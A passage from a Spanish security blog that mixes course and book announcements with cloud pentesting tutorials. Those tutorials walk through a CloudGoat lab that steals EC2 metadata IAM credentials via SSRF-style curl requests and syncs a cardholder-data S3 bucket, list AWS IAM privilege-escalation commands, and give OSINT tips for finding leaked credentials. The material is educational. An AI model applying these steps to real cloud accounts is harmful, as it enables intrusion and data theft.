THE HACKING DAY BLOG

NUEVO TALLER - TEST DE VULNERABILIDADES A APLICACIONES WEB MEDIANTE BURPSUITE + IA

2026-01-21T13:51:00.001-05:00

🚀 Invitación Especial – Curso: Test de Aplicaciones Web con Burp Suite + IA

¿Quieres llevar tus habilidades de pentesting web al siguiente nivel? Te invitamos a nuestro taller práctico donde aprenderás a dominar Burp Suite e integrar Inteligencia Artificial para automatizar tareas, optimizar análisis y potenciar tus pruebas de seguridad.

Durante el curso aprenderás a:
🔹 Interceptar y modificar tráfico HTTP/HTTPS
🔹 Identificar y explotar vulnerabilidades como XSS, SQLi, CSRF e IDOR
🔹 Usar IA para generar payloads, PoCs y reportes técnicos
🔹 Trabajar con escenarios reales de laboratorio

🎯 Ideal para estudiantes y profesionales de ciberseguridad que buscan fortalecer su perfil en pentesting web con herramientas modernas y enfoque práctico.

🕒 Horario del curso: Hora de Colombia (UTC-5).

🔗 Inscríbete aquí: https://bit.ly/4b4Lgv7

🔐 Aprende. Practica. Hackea con propósito.

¡Se acabó la espera! Nuevas ediciones y libros de 0xword están por llegar - COLOMBIA

2025-04-07T08:49:00.007-05:00

Después de meses de expectativa, ¡finalmente podemos anunciar que las nuevas ediciones y libros de la Editorial 0xword están casi aquí! Sabemos que muchos de ustedes han estado esperando con ansias lo que tenemos preparado, y no los hemos decepcionado.

Nuevas ediciones con contenido actualizado y ampliado

Estas nuevas ediciones no solo presentan contenido completamente renovado y actualizado, sino que también incluyen capítulos inéditos que cubrirán los últimos avances en el mundo de la ciberseguridad, el hacking ético y mucho más. 0xword ha sido pionero en la creación de recursos educativos de calidad para los profesionales del sector, y con estos nuevos lanzamientos, seguimos marcando la diferencia.

Libros innovadores para cada nivel

Ya sea que seas un principiante en el mundo de la ciberseguridad o un profesional avanzado, nuestros nuevos libros están diseñados para ofrecerte una experiencia de aprendizaje única. Desde conceptos básicos hasta técnicas de hacking avanzadas, cada página está pensada para que puedas mejorar tus habilidades y adquirir nuevos conocimientos.

¿Qué puedes esperar de los nuevos lanzamientos?

Actualización constante: Todos nuestros títulos están alineados con las últimas tendencias y tecnologías.
Enfoque práctico: Con ejercicios, ejemplos y casos de estudio, los lectores podrán aplicar lo aprendido en situaciones reales.
Nuevas perspectivas: Traemos contenido fresco, desarrollado por expertos de la industria que han estado al frente de las investigaciones más importantes en el campo de la ciberseguridad.

¡Pronto podrás tenerlos en tus manos!

La espera está por terminar, y nos emocionan mucho los próximos lanzamientos. Mantente atento a nuestras redes sociales y página web para los detalles sobre fechas de lanzamiento y cómo puedes obtener tu copia. ¡La cuenta regresiva ha comenzado!

Para realizar sus pedidos, no dejes de visitar el siguiente Link en la opción de Libros:

https://www.itforensic-la.com/pages/productos.html

@jcaitf

LOS PROFESIONALES DE LA SEGURIDAD "CAMINAN SOBRE LA CUERDA FLOJA" EN ESTA ERA DE AMENAZAS DIGITALES

2024-07-25T07:49:00.002-05:00

LOS PROFESIONALES DE LA SEGURIDAD "CAMINAN SOBRE LA CUERDA FLOJA" EN ESTA ERA DE AMENAZAS DIGITALES

Los profesionales de hoy en día se enfrentan a una realidad cada vez más peligrosa en el ámbito digital, donde las amenazas sofisticadas evolucionan constantemente. Esta situación se asemeja a caminar sobre la cuerda floja, ya que exige un equilibrio constante entre la innovación y la protección, entre el riesgo y la recompensa. Diversos factores contribuyen a este panorama desafiante:

Amenazas en constante aumento: Los ciberdelincuentes y actores maliciosos no dejan de desarrollar nuevas técnicas para atacar sistemas, robar datos y comprometer la información confidencial. El panorama de las amenazas es cada vez más complejo, con ataques como el phishing, el malware, el ransomware y las filtraciones de datos que se vuelven más comunes y sofisticados.

Superficie de ataque en expansión: Con la creciente dependencia de las tecnologías digitales en todos los aspectos de la vida, la superficie de ataque se ha ampliado exponencialmente. Los dispositivos móviles, las aplicaciones en la nube, el Internet de las Cosas (IoT) y las redes sociales introducen nuevos puntos de entrada que los ciberdelincuentes pueden explotar.

Falta de concienciación y formación: A pesar de los crecientes riesgos, muchos profesionales y organizaciones aún no son plenamente conscientes de las ciberamenazas o no cuentan con la formación adecuada para defenderse. Esto crea vulnerabilidades que los actores maliciosos pueden aprovechar fácilmente.

Presión para innovar rápidamente: En el mundo actual impulsado por la tecnología, las empresas y las organizaciones se ven presionadas a innovar rápidamente y adoptar nuevas tecnologías. Sin embargo, esta prisa por innovar puede conducir a descuidar la seguridad, dejando los sistemas y datos expuestos a riesgos.

Cumplimiento normativo complejo: El panorama regulatorio en torno a la ciberseguridad es cada vez más complejo, con diferentes países y regiones que implementan sus propias leyes y regulaciones. Los profesionales deben navegar por este entorno normativo y garantizar que sus organizaciones cumplan con todas las normas aplicables, lo que añade otra capa de complejidad.

En este entorno desafiante, los profesionales deben adoptar un enfoque proactivo para la ciberseguridad. Esto implica:

Mantenerse actualizado sobre las amenazas: Es fundamental estar al día sobre las últimas amenazas y vulnerabilidades cibernéticas. Los profesionales deben seguir las fuentes de noticias de seguridad confiables, asistir a conferencias y talleres, y participar en comunidades de seguridad en línea.

Implementar controles de seguridad adecuados: Es necesario implementar controles de seguridad sólidos y adecuados para proteger los sistemas y datos. Esto incluye firewalls, sistemas de detección de intrusos (IDS), software antivirus y antimalware, y soluciones de cifrado.

Formar y concienciar a los empleados: Los empleados son la primera línea de defensa contra las ciberamenazas. Es fundamental proporcionarles formación adecuada sobre seguridad cibernética y concienciarlos sobre los riesgos y las mejores prácticas.

Adoptar un enfoque de seguridad en profundidad: La seguridad no debe ser una ocurrencia tardía, sino que debe integrarse en todos los aspectos de la organización. Un enfoque de seguridad en profundidad implica implementar múltiples capas de protección para minimizar el riesgo de que una sola falla comprometa todo el sistema.

Realizar pruebas y evaluaciones periódicas: Es importante realizar pruebas y evaluaciones de seguridad periódicas para identificar y abordar las vulnerabilidades. Esto puede incluir pruebas de penetración, evaluaciones de riesgo y auditorías de seguridad.

Caminar sobre la cuerda floja en la era digital actual puede ser un desafío, pero al tomar las medidas adecuadas y adoptar un enfoque proactivo de la ciberseguridad, los profesionales pueden reducir significativamente su riesgo y proteger sus organizaciones y datos.

Fuente RegSEg

PENTESTING A SERVIDORES EN LA NUBE DE AMAZON AWS Y MICROSOFT AZURE

2024-05-15T10:26:00.000-05:00

Continuando con el tema de Pentesting Cloud, en esta entrada basada en el artículo “Pentesting a servidores en la nube de Amazon AWS y Microsoft Azure.” de Jhonatan Valencia Arango. Se hablará sobre algunas técnicas y herramientas utilizadas para el Pentesting a servidores alojados en estas plataformas.

PENTESTING EN LA NUBE DE AWS

AWS en la actualidad ofrece cientos de servicios que se alojan en la nube, entre ellos se brindan servicios de cómputo y almacenamiento, entrega de contenido, administración de seguridad, infraestructura, redes, entre otros. Dentro de los servicios a los cuales les podemos realizar pruebas de penetración en AWS se tienen, por ejemplo, API’s que se hayan desarrollado, aplicaciones web, máquinas virtuales y lo que definitivamente no se puede probar están los servidores pertenecientes a AWS, hardware físico o infraestructura que pertenezca a AWS, EC2 que pertenezcan al proveedor, entre otros.

A continuación se realizará un caso práctico de penetración de caja negra en nube para ver las vulnerabilidades (basado en el caso de la entidad bancaria Capital One, sucedida en el año 2019) utilizando las herramientas cloudgoat y prowler (Se deben tener privilegios administrativos): aws sts get-caller-identity

Imagen 1 - Validamos mediante el CLI que se haya iniciado sesión con las credenciales de AWS. (Fuente: AWSSecurityLATAM )

Se debe buscar el repositorio de git para descargar cloudgoat y seguir los pasos para desplegarlo, comenzando por clonar el repositorio: git clone https://github.com/RhinoSecurityLabs/cloudgoat.git

Imagen 2 - Pasos para clonar repositorio cloudgoat. (Fuente: AWSSecurityLATAM )

Se debe ejecutar el comando que instala las librerías necesarias para ejecutar cloudgoat y otorgar permisos para ejecución: pip3 install -r ./core/Python/requirements.txt

Imagen 3 - Dependencias instaladas para el funcionamiento de cloudgoat. (Fuente: AWSSecurityLATAM)

Chmod u+x cloudgoat.py

Imagen 4 - Comando para otorgar permisos a cloudgoat. (Fuente: AWSSecurityLATAM )

Se debe crear un perfil en cloudgoat: ./cloudgoat.py config profile

Imagen 5 - Comando para crear perfíl en cloudgoat. (Fuente: AWSSecurityLATAM )

Adentrándose un poco más en el repositorio y la documentación de cloudgoat, se evidencia que existen diferentes escenarios y la dificultad para los cuales se puede utilizar la herramienta, en este caso se usará el escenario cloud_breach_s3 considerada como dificultad moderada.

Se ejecuta el comando de cloudgoat con el escenario deseado: ./cloudgoat.py create cloud_breach_s3

Imagen 6 - Comando para ejecutar el escenario cloud_breach_s3 en cloudgoat. (Fuente: AWSSecurityLATAM )

Imagen 7 - Resultado de ejecutar el escenario cloud_breach_s3 en cloudgoat. (Fuente: AWSSecurityLATAM )

Se puede identificar que el resultado de ejecutar el escenario cloud_breach_s3, nos retorna una IP pública, la cual se utilizará para realizar el escaneo, es por esta razón que se dice que se realizará una prueba de caja negra ya que no se proporciona mayor información sobre los servicios que tiene alojada la cuenta de AWS.

mkdir breach_s3

Imagen 8 - Crear un directorio en la raíz llamada cloud_breach_s3 para almacenar toda la información que se vaya obteniendo. (Fuente: AWSSecurityLATAM )

Se ejecuta Nmap para descubrir equipos, puertos, evaluaciones de seguridad, análisis de seguridad sobre servicios de activos tecnológicos, en este caso, se requiere para escanear los puertos y sus versiones: nmap -sV –min-rate=5000 -p- 18.204.23.134

Imagen 9 - Escaneo de todos los puertos existentes con Nmap. (Fuente: AWSSecurityLATAM )

Se debe abrir una nueva terminal e ingresar con el super usuario para clonar el repositorio de la herramienta Prowler, la cual permite realizar análisis de seguridad, basada en los controles del CIS (Controles de Seguridad de Internet). git clone https://github.com/toniblyx/prowler

Imagen 10 - Proceso de clonado del repositorio de Prowler. (Fuente: AWSSecurityLATAM )

Se ingresa a la carpeta de prowler: ls

Imagen 11 - Listado de elementos en la carpeta de Prowler. (Fuente: AWSSecurityLATAM )

Se realiza el escaneo de vulnerabilidades con Prowler: ./prowler

Imagen 12 - Escaneo de Prowler. (Fuente: AWSSecurityLATAM )

Imagen 13 - Resultados del escaneo de Prowler. (Fuente: AWSSecurityLATAM )

Prowler realiza el escaneo y verificación de los diferentes puntos de control que se encuentran publicados en el CIS, iniciando por el módulo de Identity and Access Management, en caso de cumplirse con el chequeo, la prueba pasa, en caso contrario, sale como fallido y serían los huecos de seguridad que deben entrar en un proceso de revisión basados en la severidad del caso (Critical, Medium, Low), ya que al no ser tratados, se facilitaría un ataque de fuerza bruta.

Al regresar a la terminal en donde se ha ejecutado el comando de Nmap, los resultados reflejan que posiblemente se tiene un bloqueo por medio de las validaciones de ping, pero se sugiere ejecutar con el flag -Pn: nmap -sV –min-rate=5000 -p- -Pn 18.204.23.134

Imagen 14 - Resultados del escaneo con Nmap y el flag -Pn. (Fuente: AWSSecurityLATAM )

Con la información resultante se evidencia que se está corriendo un servidor http en el puerto 80, para lo cual podemos hacer una auditoría utilizando la herramienta Nikto para identificar vulnerabilidades web, en el caso de este servidor arroja que no tiene la cabecera de seguridad X-frame-Options y puede ser vulnerable a ataques de clickjacking(Ingeniería social), tampoco cuenta con cabecera X-XSS-Protection lo cual podría ser vulnerable a explotación de formularios XSS, así mismo, se puede evidenciar que no cuenta con cabecera X-Content-Type-Options: nikto -h http://18.204.23.134

Imagen 15 - Auditoría con Nikto. (Fuente: AWSSecurityLATAM )

Al realizar una petición Get mediante cURL a la IP del servidor web, retorna etiquetas HTML que indica que el servidor es un proxy hacia EC2 matadata service (Datos de la instancia que sirven para configurar o administrar la instancia en ejecución). curl http://18.204.23.134

Imagen 16 - Resultado del cURL. (Fuente: AWSSecurityLATAM )

Se debe ejecutar el cURL siguiendo la recomendación que se da en la etiqueta HTML, asignando una cabecera con host, se debe usar la IP de la instancia local que permite el enlace local de EC2. curl -H “host: 169.254.169.254” http://18.204.23.134

Imagen 17 - Resultado del cURL asignando la cabecera. (Fuente: AWSSecurityLATAM )

Se debe acceder al directorio en donde se encuentra la metadata: curl -H “host: 169.254.169.254” http://18.204.23.134/latest/meta-data/

Imagen 18 - Resultado del cURL asignando accediendo al directorio de la metadata. (Fuente: AWSSecurityLATAM )

Desde el punto de vista de un atacante, el directorio al que inicialmente se accedería, sería la de iam: curl -H “host: 169.254.169.254” http://18.204.23.134/latest/meta-data/iam/

Imagen 19 - Resultado de acceder al directorio de iam. (Fuente: AWSSecurityLATAM )

Ahora es posible acceder al role que devuelve el resultado y a la información allí contenida: curl -H “host: 169.254.169.254” http://18.204.23.134/latest/meta-data/iam/security-credentials/cg-banking-WAF-Role-cloud_breach_s3_cgidxl4rdallle

Imagen 20 - Información del role. (Fuente: AWSSecurityLATAM )

Este caso práctico demuestra la gravedad de haber configurado como proxy y crear una comunicación desde una IP pública hasta una IP privada encargada de mostrar el servicio de metadatos, exponiendo información como las credenciales de un role específico.

Ahora ya es posible autenticarse con las credenciales expuestas: aws configure --profile cloudgoat

Imagen 21 - Autenticación con credenciales del role expuesto. (Fuente: AWSSecurityLATAM )

Se edita el archivo de credenciales para actualizar el token con el que se ha expuesto: nano /root/.aws/credentials

Imagen 22 - Modificar archivo credentials. (Fuente: AWSSecurityLATAM )

Imagen 23 - Actualización del archivo. (Fuente: AWSSecurityLATAM )

Para comprobar que ya se puede acceder con esas credenciales se debe ejecutar el comando sts y comprobar que el role es el que se ha expuesto: aws sts get-caller-identity --profile cloudgoat

Imagen 24 - Ejecución del comando sts. (Fuente: AWSSecurityLATAM )

Para comprobar a qué servicios se tiene acceso, se utiliza una herramienta para ataques de fuerza bruta, llamada enumerate iam, se puede descargar el repositorio de git y seguir los pasos para poder usarla: ls

cat enumerate_iam.txt

aws sts get-caller-identity --profile cloudgoat

Imagen 25 - Uso de enumerate iam. (Fuente: AWSSecurityLATAM )

Ahora que se tiene el conocimiento de los recursos a los cuales se puede acceder mediante el uso de las credenciales que se han obtenido, se pueden listar los buckets de S3 y los archivos que contiene: aws s3 ls --profile cloudgoat

Imagen 26 - Listado de buckets y sus archivos. (Fuente: AWSSecurityLATAM )

Finalmente se puede sincronizar el bucket de S3 con la carpeta local que se ha creado anteriormente, llamada breach_s3 para poder descargar los archivos en la máquina local y poder manipularlos: cd breach_s3/

aws s3 sync s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidxl4rdallle ./ --profile cloudgoat

ls -la

Imagen 27 - Sincronización del bucket de S3. (Fuente: AWSSecurityLATAM )

Si bien es cierto que AWS ofrece una plataforma sólida para alojar la infraestructura y aplicaciones de las organizaciones, la seguridad es algo que siempre se debe cuidar ya que la fuga de información confidencial es un incidente que puede costar mucho y dañar la reputación de las industrias, para evitarlo se han creado diversas herramientas que permiten encontrar vulnerabilidades, entre ellas tenemos las siguientes:

AWS Config: Permite evaluar, registrar y auditar las diferentes configuraciones de todos los recursos de AWS.
Intruder: Permite escanear toda la nube, siendo capaz de monitorear sus redes, aplicaciones web y los diferentes entornos configurados.
Astra Pentest: Permite encontrar vulnerabilidades y ofrece recomendaciones para corregirlas.
Cloudmapper: Herramienta de código abierto que permite visualizar de manera interactiva los activos, servicios y componentes de la nube.
CloudSploit: Permite detectar cientos de amenazas en una cuenta de AWS.

PENTESTING EN LA NUBE DE MICROSOFT AZURE

Azure representa una inmensa colección de servidores y hardware los cuales contienen una variada gama de aplicaciones distribuidas. La implementación de una infraestructura cloud trae consigo ciertas ventajas como los costos, que son de fácil administración, entre muchas otras. Sin embargo, así como en los demás proveedores de servicios en la nube, el tema de la seguridad debe ser revisado minuciosamente por la compañía implementadora, ya que son vulnerables a diferentes ataques que afectan su buen funcionamiento o pueden estar sujetos a la exposición de la información de sus clientes.

A continuación, se realizará un caso práctico de penetración de a la nube de Microsoft Azure para ver las vulnerabilidades que puede presentar:

nmap -oX nmap-scan-puertos_externo.xml -sV -P -O 4.227.194.97

Imagen 28 - Escaneo de puertos con Nmap. (Fuente: Fundación Universitaria Los Libertadores. Sede Bogotá.)

Se puede evidenciar que al realizar el escaneo, se encuentran los puertos con los cuales se puede acceder a los servicios y validar los privilegios del servidor.

nmap -oX nmap-scan-web_externo.xml -p 80 -script=http-enum 4.227.194.97

Imagen 29 - Determinar los archivos y carpetas existentes. (Fuente: Fundación Universitaria Los Libertadores. Sede Bogotá.)

Para un ataque, el resultado anterior no representa información que pueda ser de mucha utilidad, para lo cual se ejecuta un nuevo escaneo usando Vulscan: nmap -sV /oX nmap-VULSCAN_externo.xml --script vulscan/ 4.227.194.97

Imagen 30 - Escaneo usando Nmap y Vulscan. (Fuente: Fundación Universitaria Los Libertadores. Sede Bogotá.)

Los resultados del escaneo revelan diferentes vulnerabilidades que se detallan a continuación:

Vulnerabilidad	Fecha publicación	Fuente	Descripción
CVE-2013-3174	07/09/2013	Microsoft Corporation	Permite a atacantes remotos ejecutar código arbitrario a través de un archivo GIF manipulado.
CVE-2013-3154	07/09/2013	Microsoft Corporation	Vulnerabilidad de nombre de ruta incorrecto de Microsoft Windows 7 Defender
CVE-2009-3555	11/09/2009	Red Hat, Inc.	Múltiples productos de Cisco y otros productos, no asocia correctamente los apretones de manos de renegociación con una conexión existente, lo que permite a los atacantes "man-in-themiddle" insertar datos en sesiones HTTPS.

Tabla 1 - Resultados del escaneo de vulnerabilidades

Se aplica el escaneo a través de la herramienta Nessus para identificar las diferentes vulnerabilidades del servicio en la nube de Microsoft Azure:

Imagen 31 - Preparación del escaneo de vulnerabilidades con Nessus. (Fuente: Fundación Universitaria Los Libertadores. Sede Bogotá.)

Imagen 32 - Ejecución del escaneo de vulnerabilidades con Nessus. (Fuente: Fundación Universitaria Los Libertadores. Sede Bogotá.)

Los resultados del escaneo reflejan que se trata de una vulnerabilidad con prioridad media y se debe a que el certificado del servidor no es confiable ya que no cuenta con una autoridad certificadora conocida.

Imagen 33 - Resultados del escaneo de vulnerabilidades con Nessus. (Fuente: Fundación Universitaria Los Libertadores. Sede Bogotá.)

Para evitar este tipo de vulnerabilidades que han sido halladas durante los escaneos, se recomienda en primera instancia configurar y habilitar un firewall, actualizar el firmware de los componentes de la red, bloquear protocolos ICMP, realizar escaneos con una alta periodicidad, realizar las actualizaciones que requiere Microsoft, controlar las herramientas de administración de paquetes nativos del sistema operativo.

@TheHackingDay

PENTESTING A SERVIDORES EN AMAZON WEB SERVICES Y GOOGLE CLOUD PLATFORM

2024-04-29T14:15:00.001-05:00

En la era digital actual, donde la infraestructura en la nube se ha convertido en el pilar fundamental de numerosas empresas, la seguridad cobra un papel protagónico. En este escenario, Amazon Web Services (AWS) y Google Cloud Platform (GCP) emergen como líderes indiscutibles en la provisión de servicios en la nube. Sin embargo, la migración hacia estos entornos virtuales no está exenta de riesgos, y es aquí donde entra en juego el Pentesting (Penetration Testing), una técnica vital para evaluar y fortalecer la seguridad de los sistemas en línea.

En esta entrada basada en el artículo “Pentesting a servidores en Amazon Web Services y Google Cloud Platform” de L. Panesso, y J. A. Piraquive. Se hablará sobre algunas técnicas y herramientas utilizadas en cada fase del Pentesting de estas plataformas.

Pentesting a servidores en Amazon Web Services

Limitaciones legales

Los clientes de AWS pueden realizar pruebas de intrusión sin previo aviso en los servicios:

Instancias EC2
NAT Gateways
Balanceadores de carga elásticos
Amazon RDS
Amazon CloudFront
Amazon Aurora
Amazon API Gateways
AWS Lambda y funciones de Lambda Edge
Recursos de Amazon Lightsail
Entornos de Amazon Elastic Beanstalk

Actividades prohibidas durante las pruebas:

Recorrido de zonas DNS a través de las zonas alojadas de Amazon Route 53
Denegación de servicio (DoS), denegación de servicio distribuida (DDoS), DoS simulada, DDoS simulada
Saturación de puertos
Saturación de protocolos
Saturación de solicitudes (de inicio de sesión o de API)

Para realizar pruebas en servicios no incluidos en la lista anterior, se debe completar un formulario y esperar la autorización de AWS.

Reconocimiento

Durante la etapa inicial, se llevará a cabo la recopilación exhaustiva de datos del objetivo a auditar. Este proceso se realizará empleando herramientas y técnicas de fuentes abiertas de inteligencia (OSINT, por sus siglas en inglés). Todos los datos obtenidos en esta fase son de acceso público, lo que implica que pueden ser adquiridos por cualquier persona. Se enfocará la búsqueda en elementos específicos como correos electrónicos, contraseñas filtradas, pares de claves AWS IAM, y servicios AWS que estén expuestos al público. El objetivo es identificar información relevante que pueda ser útil para futuras exploraciones del objetivo.

Reconocimiento Pasivo: El reconocimiento pasivo implica que el auditor recopila información del objetivo sin interactuar directamente con él, sin realizar solicitudes directas. Para obtener acceso a las cuentas de AWS del objetivo, los correos electrónicos del dominio del objetivo son de gran utilidad. Herramientas como hunter.io, phonebook.cz o theHarvester pueden ser utilizadas para este fin.

Además del correo electrónico, se necesita la contraseña asociada. Se pueden buscar credenciales filtradas en bases de datos como intelex.io, bugmenot, pwndb2 o breach-parse para evitar la realización de ataques de fuerza bruta en el portal de login de AWS. Los pares de claves IAM son cruciales para explotar el objetivo, ya que la mayoría de los ataques en entornos AWS ocurren debido a políticas IAM mal configuradas. Estas claves pueden encontrarse en Github, donde los desarrolladores a menudo suben código con claves AWS. Herramientas como truffleHog facilitan la búsqueda de estas credenciales. Es importante identificar los servicios AWS expuestos al público, como Instancias EC2 y Buckets S3. Se pueden utilizar servicios como Shodan, dnsdumpster y crt.sh para enumerar subdominios y descubrir servicios asociados al objetivo, y luego verificar qué servicios pertenecen a AWS mediante un script que utilice nslookup.

Para identificar servicios de AWS expuestos al público, existen dos métodos principales:

Peticiones al servidor DNS: Una manera eficiente de obtener los nombres de dominio de todas las máquinas dentro de un dominio es solicitando una transferencia de zona al servidor DNS correspondiente. Esta acción se realiza utilizando herramientas que permiten realizar estas solicitudes, como el comando 'host', comúnmente disponible en distribuciones GNU/Linux. Es importante tener en cuenta que las transferencias de zona pueden no estar autorizadas en algunos casos.
Fuerza bruta: Si no es posible realizar una transferencia de zona, se puede recurrir a la fuerza bruta sobre el servidor DNS para enumerar los subdominios. Esto implica utilizar una wordlist que contenga posibles subdominios, como las disponibles en la colección de Seclists. Herramientas como dnsrecon pueden ser utilizadas para llevar a cabo esta tarea, especificando la opción '-t brt' para indicar el uso de fuerza bruta.

En el caso de los Buckets S3 expuestos al público, estos suelen tener dos nombres de dominio. Uno de ellos es predefinido e inmutable, mientras que el otro sigue la estructura subdominio-arbitrario.s3.amazonaws.com. Debido a esta estructura predecible, los Buckets S3 pueden ser fácilmente enumerados si no se utiliza una aleatorización en los subdominios. Esto significa que a partir de una wordlist, como la aws-s3-bucket-wordlist, es posible enumerar estos Buckets con relativa facilidad. Herramientas como Sandcastle pueden ser empleadas para llevar a cabo esta enumeración de manera efectiva.

Escaneo y enumeración

Después de completar el Reconocimiento, se procederá a la etapa de Escaneo y Enumeración. Durante esta fase, el auditor interactuará con el objetivo, explorando y listando los diversos servicios de AWS. No se emplea el mismo enfoque para cada uno de ellos.

1) Escaneo de Puertos en Instancias EC2: Las Instancias EC2 a menudo brindan servicios en varios puertos, como por ejemplo el servicio web en los puertos 80/443. Por esta razón, es necesario realizar un escaneo de puertos para identificar y listar los distintos servicios en funcionamiento en ellos. Normalmente, se emplea la herramienta Nmap para llevar a cabo esta tarea.

Una vez se haya identificado los diferentes puertos abiertos, es crucial analizar cada uno de ellos individualmente para enumerar exhaustivamente todos los servicios alojados en ellos.

2) Enumeración de Permisos IAM: Si se poseen claves IAM del objetivo, se pueden enumerar diversos elementos. La enumeración manual se realiza con AWS-CLI.

A continuación, se muestran algunos comandos básicos para enumerar políticas IAM. El proceso de enumerar políticas asociadas a un usuario o rol se puede automatizar con AWSRecon.

En algunos casos, no se tendrán permisos para listar las políticas, por lo que se deberá realizar una fuerza bruta sobre las llamadas a la API de AWS. Este proceso también se puede automatizar con la herramienta enumerate-iam.

Tabla 1 - Comandos para enumerar información básica del perfil iam

Tabla 2 - Comandos para enumerar políticas de un usuario

Tabla 3 - Comandos para enumerar políticas de un rol

Explotación

Una vez completado el escaneo y la enumeración, se avanzará hacia la etapa de Explotación. Durante esta fase, se encargará de identificar posibles vulnerabilidades de seguridad basándose en los datos recopilados anteriormente.

Estas vulnerabilidades pueden variar desde un portal web con una vulnerabilidad de SQL Injection en su función de inicio de sesión, hasta permisos IAM que le posibiliten aumentar sus privilegios en el sistema.

1) Explotación de Instancias EC2: La explotación de Instancias EC2 se basa en gran medida en el aprovechamiento de los servicios disponibles en sus puertos. Esto implica identificar y aprovechar principalmente vulnerabilidades conocidas en servicios desactualizados para obtener acceso a la Instancia EC2. Una manera de encontrar estas vulnerabilidades es mediante bases de datos como exploitdb, que proporcionan información detallada sobre vulnerabilidades específicas y sus exploits asociados.

Si bien no es factible abordar todos los servicios posibles en el alcance de un proyecto, existen recursos adicionales como HackTricks, que se centran en explicar cómo explotar los servicios más comunes de manera más detallada. Estos recursos proporcionan guías y técnicas para comprender y aprovechar las vulnerabilidades presentes en los servicios típicamente encontrados en las Instancias EC2, permitiendo a los usuarios familiarizarse con las mejores prácticas para asegurar sus sistemas frente a posibles ataques.

2) Explotación de Permisos IAM: Hay ciertos permisos que pueden ser aprovechados para adquirir los suficientes privilegios que permitan el control total de la infraestructura de AWS. Estos permisos pueden ser examinados manualmente, pero hay una herramienta llamada aws_escalate.py que realiza esta enumeración de manera automática y también identifica los métodos que pueden ser utilizados para llevar a cabo la explotación.

A continuación, se listan los diferentes permisos de IAM que son susceptibles a explotación, con su respectiva descripción.

Tabla 4 - Permisos iam susceptibles a explotación

Se puede generar una nueva edición de una directiva mediante el uso del permiso iam:CreatePolicyVersion, el cual permite crear una variante actualizada de una directiva existente a la que se tiene acceso. Para que esta nueva edición entre en vigor, es necesario configurarla como la versión predeterminada, lo que requiere además del permiso iam:SetDefaultPolicyVersion. Sin embargo, en algunos casos, no será indispensable este último permiso, ya que se puede establecer la nueva edición como predeterminada al momento de su creación mediante la opción --set-as-default. Una forma de aplicar este enfoque sería a través de un comando similar al siguiente:

aws –profile [PERFIL] iam create-policy-version -policy-arn [ARN_DE_LA_POLITICA] –policy-document file:[PATH_AL_policy.json] –set-as-default

El archivo policy.json debe contener una directiva que permita ejecutar cualquier acción sobre cualquier recurso de la cuenta, como se muestra a continuación:

Imagen 1 - Política IAM con privilegios de administrador

Para cambiar la versión predeterminada de la directiva, se requiere el permiso iam:SetDefaultPolicyVersion, que en algunos casos puede ser utilizado para aumentar los privilegios mediante el uso de versiones de directivas no utilizadas. Un ejemplo de cómo ejecutar este método sería el siguiente:

aws –profile [PERFIL] iam set-default-policy-version –policy-arn [ARN_DE_LA_POLÍTICA] –version-id [VERSIÓN]

Para crear una nueva clave de acceso, el usuario necesita el permiso iam:CreateAccessKey, lo que le permite generar un Access Key ID y un Secret Access Key para otro usuario dentro del entorno AWS. Un ejemplo de aplicación de este método sería el siguiente:

aws –profile [PERFIL] iam create-access-key –user-name [USUARIO]

Para asociar una directiva a un usuario, es esencial tener el permiso iam:AttachUserPolicy, que posibilita aumentar los privilegios al vincular una directiva a la que el usuario tenga acceso, otorgándole así los permisos definidos por dicha directiva. Un comando que ilustra cómo llevar a cabo este proceso sería:

aws –profile [PERFIL] iam attach-user-policy –user-name [USUARIO] –policy-arn [ARN_DE_LA_POLÍTICA]

Este método se puede aplicar de manera similar a grupos (iam:AttachGroupPolicy) y roles (iam:AttachRolePolicy).

Para crear o actualizar directivas asociadas a un usuario, el usuario necesita el permiso iam:PutUserPolicy, lo que le permite aumentar los privilegios al crear o actualizar una directiva a la que tenga acceso, añadiendo así permisos definidos por dicha directiva. Un comando para ejecutar este método sería:

aws –profile [PERFIL] iam put-user-policy –user-name [USUARIO] –policy-name [NOMBRE_DE_LA_POLÍTICA] –policy-document file:[PATH_A_LA_POLÍTICA]

Este proceso se puede extender a grupos (iam:PutGroupPolicy) y roles (iam:PutRolePolicy).

Para asignar un rol IAM existente a una nueva función Lambda y luego invocarla, el usuario necesita los permisos iam:PassRole, lambda:CreateFunction y lambda:InvokeFunction, lo que le permite aumentar los privilegios al asignar un rol IAM a una función Lambda y ejecutarla con los privilegios asociados a ese rol. Un ejemplo de cómo realizar esto sería:

aws –profile [PERFIL] lambda create-function –function-name [NOMBRE_INVENTADO] –runtime python3.6 –role [ARN_DEL_ROL] –handler lambda_function.lambda_handler –code file:[PATH_AL_SCRIPT]

El código utilizado podría ser un script en Python que otorgue privilegios de Administrador a un usuario específico, como se muestra a continuación:

Imagen 2 - Script en Python para función Lambda maliciosa

Luego de crear la función Lambda, el usuario debería invocarla para otorgar los privilegios de Administrador al usuario:

aws lambda invoke –function-name [NOMBRE_DE_LA_FUNCIÓN] response.txt

Para actualizar el código de una función Lambda existente, el usuario necesita el permiso lambda:UpdateFunctionCode, lo que le permite actualizar el código de una función Lambda asociada a un rol IAM, lo que posibilita realizar acciones en nombre de ese rol. Un ejemplo de cómo realizar esto sería:

aws –profile [PERFIL] lambda update-function-code –function-name [FUNCIÓN_OBJETIVO] –zip-file file:[ZIP_CON_EL_SCRIPT]

Se debe tener en cuenta que, si no se poseen los permisos necesarios, se debe esperar a que alguien más invoque la función Lambda.

Pentesting a servidores en Google Cloud Platform

Limitaciones legales

Los clientes de GCP pueden realizar pruebas de intrusión con previo aviso sobre sus servicios:

AI Platform
API Keys
App Engine
Artifact Registry
Bigquery
Bigtable
Cloud Build
Cloud Functions
Cloud Run
Cloud Shell
Cloud SQL
Compute
Containers, GKE & Composer
DNS
Filestore
Firebase
Firestore
IAM, Principals & Org Policies
KMS
Logging
Memorystore
Monitoring
Pub/Sub
Secrets Manager
Security
Source Repositories
Spanner
Stackdriver
Storage

Reconocimiento

Durante la etapa inicial, se llevará a cabo la recopilación exhaustiva de datos del objetivo a auditar. Este proceso se realizará empleando herramientas y técnicas de fuentes abiertas de inteligencia (OSINT, por sus siglas en inglés). Todos los datos obtenidos en esta fase son de acceso público, lo que implica que pueden ser adquiridos por cualquier persona. Se enfocará la búsqueda en elementos específicos como credenciales, y servicios GCP que estén expuestos al público. El objetivo es identificar información relevante que pueda ser útil para futuras exploraciones del objetivo.

